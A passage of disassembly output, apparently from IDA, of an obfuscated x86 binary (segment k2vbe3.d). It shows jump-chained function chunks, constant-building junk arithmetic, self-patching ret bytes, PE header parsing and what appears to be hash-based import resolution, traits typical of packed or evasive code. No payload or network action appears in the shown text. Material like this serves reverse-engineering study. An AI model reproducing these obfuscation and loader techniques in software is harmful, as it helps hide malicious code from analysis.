		push	offset loc_441867
		jmp	nullsub_237
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_44F050:				; CODE XREF: sub_4471DC:loc_445055j
		push	ecx
		push	6700B330h
		pop	ecx
		xor	ecx, 0E4A08F71h
		or	ecx, 18BEF495h
		jmp	loc_455942
; END OF FUNCTION CHUNK	FOR sub_4471DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_44F068:				; CODE XREF: sub_44E481:loc_44036Fj
		xchg	ebp, ebx
		jmp	loc_44614F
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------

loc_44F06F:				; CODE XREF: k2vbe3.d:loc_44C548j
		jbe	loc_449821
		xchg	ebp, edi
		jmp	loc_44A74E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500BB

loc_44F07C:				; CODE XREF: sub_4500BB-8D51j
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_450CBF

loc_44F086:				; CODE XREF: sub_44DD31+CC99j
		jmp	nullsub_99
; END OF FUNCTION CHUNK	FOR sub_4500BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_44F08B:				; CODE XREF: sub_44498A+74ECj
		jmp	loc_44CB37
; END OF FUNCTION CHUNK	FOR sub_44498A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_44F090:				; CODE XREF: sub_4499EC-CFCFj
					; k2vbe3.d:loc_43D459j
		jmp	loc_4410C5
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456767

loc_44F095:				; CODE XREF: sub_456767:loc_450FECj
		push	376D331Fh
		xchg	esi, [esp+4+var_4]
		mov	ecx, esi
		pop	esi
		or	ecx, 91FB4913h
		jmp	loc_457AA7
; END OF FUNCTION CHUNK	FOR sub_456767
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_44F0AB:				; CODE XREF: sub_43F364:loc_44DA25j
		xchg	edx, [esi]

loc_44F0AD:				; CODE XREF: sub_43F364+9j
		and	edx, 3874FF74h

loc_44F0B3:				; CODE XREF: k2vbe3.d:loc_43D7E1j
		test	edx, 80000000h
		jmp	loc_449511
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------

loc_44F0BE:				; CODE XREF: k2vbe3.d:0044192Cj
		popf
		sbb	ecx, ebp
		adc	ebp, edi
		jmp	loc_44618E
; ---------------------------------------------------------------------------

loc_44F0C8:				; CODE XREF: k2vbe3.d:loc_45858Aj
		pop	eax
		and	eax, 0B031FC0Ch
		cmp	eax, 8F03D67Bh
		jmp	loc_45A548
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44F0DA:				; CODE XREF: sub_45A323-19A37j
		sub	esi, ecx
		jmp	loc_4549B6
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		mov	eax, 147A4491h
		push	edx
		push	749BACD8h
		pop	edx
		add	edx, 4AD15A05h
		sub	edx, 0AA63175Ah
		jmp	loc_44731B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_44F0FE:				; CODE XREF: sub_4506C3+Cj
		or	eax, eax
		jnz	loc_43F6DA
		jmp	loc_449FD0
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------

loc_44F10B:				; CODE XREF: k2vbe3.d:00443738j
		ror	ebp, 2
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44F10E:				; CODE XREF: sub_4424CF+D79Fj
		add	ecx, 0F358670Bh
		add	ecx, ebp
		add	ecx, 890B5Fh
		mov	ecx, [ecx]
		jmp	loc_4406BA
; END OF FUNCTION CHUNK	FOR sub_4424CF

; =============== S U B	R O U T	I N E =======================================



sub_44F123	proc near		; CODE XREF: k2vbe3.d:00449139j
					; sub_44E542-2075p

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		push	1F791FDDh
		pop	eax
		sub	eax, 61763795h
		add	eax, 4241B4D2h
		xchg	eax, [esp-4+arg_0]
		jmp	sub_43CC89
sub_44F123	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	eax, 1Ch
		jmp	sub_44DD31
; ---------------------------------------------------------------------------

loc_44F149:				; CODE XREF: k2vbe3.d:00441A33j
		add	ecx, 2FF2D8EEh
		sub	ecx, 162F8A47h
		add	ecx, 59051466h
		xchg	ecx, [esp]
		jmp	loc_4587B8
; ---------------------------------------------------------------------------

loc_44F163:				; DATA XREF: sub_43DD3A+5o
		mov	edx, 0F2B89A19h
		push	ebx
		push	5F49A7F9h
		pop	ebx
		jmp	loc_449BEE

; =============== S U B	R O U T	I N E =======================================



sub_44F174	proc near		; CODE XREF: k2vbe3.d:0043E4F1j
					; sub_4484A9+6p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C32D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043CBC1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440CA7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00440D4B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004430CD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446D0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C3FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D87 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00455A20 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		lea	eax, loc_448B20
		push	eax
		push	eax
		mov	edx, eax
		jmp	loc_454D87
sub_44F174	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3A3

loc_44F187:				; CODE XREF: sub_44D3A3-102FFj
		jz	loc_44C17A
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		jmp	loc_4483EF
; END OF FUNCTION CHUNK	FOR sub_44D3A3

; =============== S U B	R O U T	I N E =======================================



sub_44F1A6	proc near		; DATA XREF: sub_43CCD0:loc_459337o

; FUNCTION CHUNK AT 00446E10 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447DCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448744 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F6D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459E3B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045C337 SIZE 0000000D BYTES

		push	0EB8E29DDh
		pop	eax
		rol	eax, 0Eh
		xor	eax, 4A400650h
		add	eax, ebp
		add	eax, 3FC88349h
		mov	eax, [eax]
		jmp	loc_459E3B
sub_44F1A6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44F1C4	proc near		; CODE XREF: sub_4423D2:loc_44002Dp
					; k2vbe3.d:004435DAj

; FUNCTION CHUNK AT 0043DDE5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043EC13 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447405 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045117D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004585A8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B2C4 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0FFE04A46h
		pop	eax
		or	eax, 0E3F5F31h
		jmp	loc_43EC13
sub_44F1C4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44F1D9:				; CODE XREF: sub_440C94+11758j
		or	ebx, 5C64A553h
		xchg	ebx, esi
		jmp	loc_44CF7F
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		sub	eax, edi
		jmp	loc_4492D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_44F1ED:				; CODE XREF: sub_43FA2C:loc_45876Cj
					; sub_43FA2C+1ADE6j
		call	sub_4436CE
		push	9B00631Bh
		pop	edx
		sub	edx, 1713AAC5h
		add	edx, 4A43AA96h
		jmp	loc_441778
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------

loc_44F209:				; CODE XREF: k2vbe3.d:004495B5j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_44F20A	proc near		; CODE XREF: sub_453347+3p

; FUNCTION CHUNK AT 0043E130 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E4FF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00441F0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E50 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00443E08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D05C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D0E6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044FE9D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004530C7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045604E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456652 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045665A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456858 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004585C1 SIZE 00000021 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax
		jmp	loc_443E08
sub_44F20A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 0D372DA5Dh
		call	sub_4553CC
		call	sub_44F3EE
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44F228:				; CODE XREF: sub_440C94+1AD13j
		jmp	loc_43C64A
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481DC

loc_44F22D:				; CODE XREF: sub_4481DC-3D23j
		jmp	locret_449510
; END OF FUNCTION CHUNK	FOR sub_4481DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575DF

loc_44F232:				; CODE XREF: sub_4575DF:loc_4563D1j
		jnz	loc_445F8D
		or	edi, esi
		sbb	ebx, eax
		jmp	loc_445F87
; END OF FUNCTION CHUNK	FOR sub_4575DF
; ---------------------------------------------------------------------------

loc_44F241:				; CODE XREF: k2vbe3.d:00452FF3j
		pop	ebx
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_44F243:				; CODE XREF: sub_4570C0j
		push	eax
		mov	eax, ebp
		jmp	loc_4542FB
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3C0

loc_44F24B:				; CODE XREF: sub_44B3C0:loc_4558DEj
		xchg	ebx, [esp+0]
		push	eax
		push	ecx
		push	4C790841h
		pop	ecx
		jmp	loc_45178B
; END OF FUNCTION CHUNK	FOR sub_44B3C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7CD

loc_44F25B:				; CODE XREF: sub_44A7CD:loc_44CA5Ej
		lea	eax, sub_458F1C
		mov	byte ptr [eax],	0C3h
		jmp	sub_458F1C
; END OF FUNCTION CHUNK	FOR sub_44A7CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_44F269:				; CODE XREF: sub_458F1C+1j
		mov	eax, [esp+0]

loc_44F26C:				; CODE XREF: k2vbe3.d:loc_442E3Cj
		push	edx
		call	sub_442D04
		push	776A4223h
		pop	eax
		jmp	loc_450DDD
; END OF FUNCTION CHUNK	FOR sub_458F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_44F27D:				; CODE XREF: sub_44533A+11j
					; sub_45BE94:loc_448B32j
		mov	edx, eax
		call	sub_45B74D
		call	sub_4508A3
		or	eax, eax
		jnz	loc_44D3F1
		jmp	loc_44D7ED
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EDE6

loc_44F296:				; CODE XREF: sub_43EDE6:loc_44C805j
		xor	esi, 61BB3DE3h
		cmp	esi, 40C0EE78h
		jmp	loc_447BD1
; END OF FUNCTION CHUNK	FOR sub_43EDE6
; ---------------------------------------------------------------------------

loc_44F2A7:				; CODE XREF: k2vbe3.d:00451D12j
		ja	loc_456786
		shl	esi, 0Bh
		jmp	loc_44F69B
; ---------------------------------------------------------------------------

loc_44F2B5:				; CODE XREF: k2vbe3.d:00456CBBj
		jz	loc_4538CB
		jmp	loc_43D331
; ---------------------------------------------------------------------------

loc_44F2C0:				; CODE XREF: k2vbe3.d:0044A706j
		sub	ecx, eax
		jnp	loc_458794
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44F2C8:				; CODE XREF: sub_456666:loc_44A6EDj
		xor	eax, 64495B90h
		add	eax, ebp
		jmp	loc_459E96
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_44F2D5:				; CODE XREF: sub_44A306-7500j
					; sub_44A306:loc_447C14j
		call	sub_4436CE
		mov	edx, 0C90D1845h
		push	esi
		push	0CFE998F9h
		jmp	loc_4551C4
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------
		ror	ebx, 11h
		jmp	sub_44A0D7
; ---------------------------------------------------------------------------

loc_44F2F2:				; CODE XREF: k2vbe3.d:00452ABDj
		jz	loc_44CC9F

loc_44F2F8:				; CODE XREF: k2vbe3.d:loc_45353Ej
		push	ecx
		push	171D9CB0h
		pop	ecx
		jmp	loc_454CA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_44F304:				; CODE XREF: sub_44BDBB-A8C5j
		sub	edi, ebx

loc_44F306:				; CODE XREF: sub_44BDBB:loc_452BEFj
		mov	eax, 0DD70DD34h
		push	edx
		push	0E5A5972h
		jmp	loc_44EC19
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44F316:				; CODE XREF: sub_4553CC:loc_450DCDj
		mov	eax, 0A11F455Ah
		call	sub_43C82E
		mov	ds:off_41E1E8, eax
		lea	eax, sub_44D0D5
		mov	byte ptr [eax],	0C3h
		jmp	sub_44D0D5
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44F334:				; CODE XREF: sub_44D0D5+1j
		mov	eax, [esp+4+var_4]
		push	ebp

loc_44F338:				; CODE XREF: k2vbe3.d:loc_4530ACj
		mov	ebp, edx
		jmp	loc_441C7B
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45244A

loc_44F33F:				; CODE XREF: sub_45244A-BB62j
		jnz	loc_43EB2A

loc_44F345:				; CODE XREF: k2vbe3.d:loc_450D26j
		jmp	loc_442946
; END OF FUNCTION CHUNK	FOR sub_45244A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_417. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_44F34B:				; CODE XREF: sub_4468FE+14545j
		jmp	loc_45AC65
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------

loc_44F350:				; CODE XREF: k2vbe3.d:00453758j
		jmp	loc_459CB8
; ---------------------------------------------------------------------------

loc_44F355:				; CODE XREF: k2vbe3.d:loc_43CAB7j
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_445648[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jmp	loc_451754
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_44F36E:				; CODE XREF: sub_44E481:loc_454766j
		push	offset loc_44A9F1
		jmp	nullsub_160
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_44F378:				; CODE XREF: sub_4467A1:loc_44D49Aj
		push	4140956h
		pop	ebx
		or	ebx, 0CCA376C0h
		and	ebx, 28D5F787h
		jmp	loc_445636
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44F38F:				; CODE XREF: sub_444B3E:loc_446D8Ej
		sub	esi, edi
		push	0D3B9F4AEh
		cmp	ecx, esi
		jmp	loc_44B7AD
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_44F39D:				; CODE XREF: sub_449067:loc_43F19Cj
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	sub_455F6B
		mov	eax, 0D504D785h
		call	sub_4553CC
		mov	ds:off_41E07C, eax
		jmp	loc_458AE6
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441632

loc_44F3BC:				; CODE XREF: sub_441632+17EDBj
		push	offset loc_444D3B
		jmp	loc_44DBDD
; END OF FUNCTION CHUNK	FOR sub_441632
; ---------------------------------------------------------------------------
		jnz	loc_446332
		jmp	loc_43FF75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44F3D1:				; CODE XREF: sub_45A323:loc_442740j
		jnz	loc_459771
		jmp	loc_44A9E7
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_44F3DC:				; CODE XREF: sub_448A7D:loc_441911j
		jl	loc_4526AB
; END OF FUNCTION CHUNK	FOR sub_448A7D
; START	OF FUNCTION CHUNK FOR sub_45744C

loc_44F3E2:				; CODE XREF: sub_45744C+7j
		jmp	loc_458E48
; END OF FUNCTION CHUNK	FOR sub_45744C
; ---------------------------------------------------------------------------
		test	eax, esi

loc_44F3E9:				; CODE XREF: k2vbe3.d:0045217Cj
		jmp	loc_43E7D5

; =============== S U B	R O U T	I N E =======================================



sub_44F3EE	proc near		; CODE XREF: k2vbe3.d:0043DAF1j
					; k2vbe3.d:0044F223p
		xchg	edx, [esp+0]
		pop	edx
		mov	ds:off_41E184, eax
		call	sub_45458E
sub_44F3EE	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44F3FD:				; CODE XREF: sub_4553CC-17A07j
		jmp	loc_4537C2
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE5C

loc_44F402:				; CODE XREF: k2vbe3.d:loc_441C1Ej
					; sub_45BE5C+8j
		push	edx
		pop	ecx
		xchg	ecx, [esp+0]
		call	sub_444615
		or	eax, ecx
		jmp	loc_450DCD
; END OF FUNCTION CHUNK	FOR sub_45BE5C
; ---------------------------------------------------------------------------
		add	ebp, 0E54268EFh

loc_44F419:				; CODE XREF: k2vbe3.d:loc_452B14j
		jmp	sub_4498C1
; ---------------------------------------------------------------------------
		xchg	ebp, [ecx]
		ja	loc_44C548
		jmp	loc_4443A6

; =============== S U B	R O U T	I N E =======================================



sub_44F42B	proc near		; CODE XREF: k2vbe3.d:0043F560j
					; sub_45A21D:loc_44493Ap

; FUNCTION CHUNK AT 0043C568 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043FD37 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449366 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B56D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B581 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004538A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454980 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00456A82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004575CE SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		or	eax, eax
		jnz	loc_44B581
		jmp	loc_4538A6
sub_44F42B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44F43C:				; CODE XREF: k2vbe3.d:00442635j
		cmp	ecx, 98A13C1Eh
		jmp	loc_459DFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44F447:				; CODE XREF: sub_4529E2:loc_456577j
		call	sub_448D3A
		mov	[ebp-4], eax
		jmp	loc_44523E
; ---------------------------------------------------------------------------

loc_44F454:				; CODE XREF: sub_4529E2:loc_44676Aj
		push	0BBAF2FB8h

loc_44F459:				; CODE XREF: sub_44FF34:loc_45031Aj
		pop	eax
		rol	eax, 13h
		jmp	loc_454C83
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44F462:				; CODE XREF: sub_44C90E+E36Fj
		shl	ecx, 5
		jmp	loc_44D1BD
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441418

loc_44F46A:				; CODE XREF: sub_441418+1Dj
		sub	eax, 3ABD318Bh
		or	eax, 0D1AB1DA2h
		xor	eax, 49D8E636h
		call	sub_4553CC
		mov	ds:off_41E0D0, eax
		lea	eax, loc_44DA08
		mov	byte ptr [eax],	0C3h
		jmp	loc_450000
; END OF FUNCTION CHUNK	FOR sub_441418
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508AF

loc_44F495:				; CODE XREF: sub_4508AF:loc_43C935j
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4508AF

; =============== S U B	R O U T	I N E =======================================



sub_44F49C	proc near		; CODE XREF: k2vbe3.d:0043C2B3p
					; sub_441DCC+5p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00453F33 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045BA05 SIZE 00000005 BYTES

		push	edx
		mov	edx, ebp
		jmp	loc_45BA05
sub_44F49C	endp

; ---------------------------------------------------------------------------

loc_44F4A4:				; CODE XREF: k2vbe3.d:0044C6BDj
		call	sub_449995
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44F4A9:				; CODE XREF: sub_44ED3C+2423j
		jmp	loc_45631A
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_44F4AE:				; CODE XREF: sub_45530F-18E17j
		jz	loc_45886D
		jmp	loc_4501B0
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------

loc_44F4B9:				; CODE XREF: k2vbe3.d:0044C5DEj
		add	eax, 4059ECh
		xchg	eax, [esp]
		jmp	loc_45B10B

; =============== S U B	R O U T	I N E =======================================



sub_44F4C7	proc near		; CODE XREF: sub_454099j
					; DATA XREF: sub_454354:loc_45408Fo
		pop	ecx
		push	offset loc_444604
		jmp	nullsub_149
sub_44F4C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_44F4D2	proc near		; CODE XREF: sub_449372+64D0p
					; k2vbe3.d:0045B205j
		xchg	edi, [esp+0]
		pop	edi
		mov	[ecx], eax
		pop	ecx
		retn
sub_44F4D2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44F4DA:				; CODE XREF: sub_4529E2+22B9j
		jmp	loc_443881
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------

loc_44F4DF:				; CODE XREF: k2vbe3.d:0044A260j
		jmp	loc_455C48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44F4E4:				; CODE XREF: sub_44D0D5-D47Bj
		jmp	loc_452226
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_44F4E9:				; CODE XREF: k2vbe3.d:0044210Ej
					; sub_44C1BD+E985j
		call	sub_459EE5
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44F4EE:				; CODE XREF: sub_44B94B:loc_4492E2j
		jmp	loc_441D78
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454CAC

loc_44F4F3:				; CODE XREF: sub_454CAC-CB23j
					; k2vbe3.d:loc_44C747j
		jmp	loc_45C321
; END OF FUNCTION CHUNK	FOR sub_454CAC
; ---------------------------------------------------------------------------

loc_44F4F8:				; CODE XREF: k2vbe3.d:loc_44CF05j
		xchg	ebx, [esp]
		jmp	loc_445306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_44F500:				; CODE XREF: sub_441D41:loc_44AD3Fj
		jnz	loc_43DD83
		jmp	loc_441369
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44F50B:				; CODE XREF: sub_445124:loc_442335j
		add	eax, 44F6EDE8h
		mov	eax, [eax]
		jno	loc_44E3EF
		push	esi
		push	0F686DEFh
		pop	esi
		jmp	loc_44233F
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458019

loc_44F525:				; CODE XREF: sub_458019-196AFj
		jz	loc_442CD7
		jmp	loc_444C7E
; END OF FUNCTION CHUNK	FOR sub_458019
; ---------------------------------------------------------------------------

loc_44F530:				; CODE XREF: k2vbe3.d:loc_455964j
		jmp	ds:dword_41E134
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_526. PRESS KEYPAD	"+" TO EXPAND]
		db 80h
		dd 0FFFFE430h, 8B242C87h, 47E85DD5h
		db 0, 2	dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_44F547:				; CODE XREF: sub_446CCF+6928j
		jmp	loc_455692
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_44F54C:				; CODE XREF: sub_447E07-A7FAj
		jnz	loc_4500FC
		jmp	loc_444306
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================



sub_44F557	proc near		; DATA XREF: k2vbe3.d:loc_451BAAo

; FUNCTION CHUNK AT 0044905F SIZE 00000008 BYTES

		push	edi
		push	0A2C59608h
		pop	edi
		and	edi, 98D629F3h
		add	edi, 7F81BC66h
		jmp	loc_44905F
sub_44F557	endp

; ---------------------------------------------------------------------------
		retn

; =============== S U B	R O U T	I N E =======================================



sub_44F570	proc near		; DATA XREF: sub_4440E5+794o
					; sub_44C1FD+5o

; FUNCTION CHUNK AT 004412F3 SIZE 00000005 BYTES

		push	ebp
		push	offset loc_458CDE
		jmp	loc_4412F3
sub_44F570	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44F57B:				; CODE XREF: sub_4553CC-2F9j
		pop	edx
		rol	edx, 0Ch
		or	edx, 85B27A45h
		test	edx, 20000000h
		jmp	loc_450786
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4527DA
		jmp	loc_4417D5
; ---------------------------------------------------------------------------

loc_44F59D:				; DATA XREF: sub_44A53A+Ao
		add	eax, ebp
		add	eax, 7EDB43Dh
		mov	eax, [eax]
		cmp	eax, ds:dword_44BD38
		jz	loc_44A78F
		jmp	loc_4486BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452DD6

loc_44F5B8:				; CODE XREF: sub_452DD6+6F55j
		jge	loc_44FCFA
; END OF FUNCTION CHUNK	FOR sub_452DD6
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44F5BE:				; CODE XREF: sub_450F71+4E11j
		jmp	loc_444224
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------

loc_44F5C3:				; CODE XREF: k2vbe3.d:00446DC3j
		jmp	loc_459BCF
; ---------------------------------------------------------------------------
		xor	ecx, ebx
		js	loc_457F23
		rol	edx, 0Bh
		sub	ebp, 3FD6FE54h
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_44F5D9:				; CODE XREF: sub_457D4B:loc_43DB46j
		jle	loc_458181
		jmp	loc_44FCFA
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E88E

loc_44F5E4:				; CODE XREF: sub_43E88E+F834j
		push	78BA1827h
		pop	ecx
		or	ecx, 0A1551C04h
		add	ecx, 645BA10h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_43EEFF
; END OF FUNCTION CHUNK	FOR sub_43E88E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

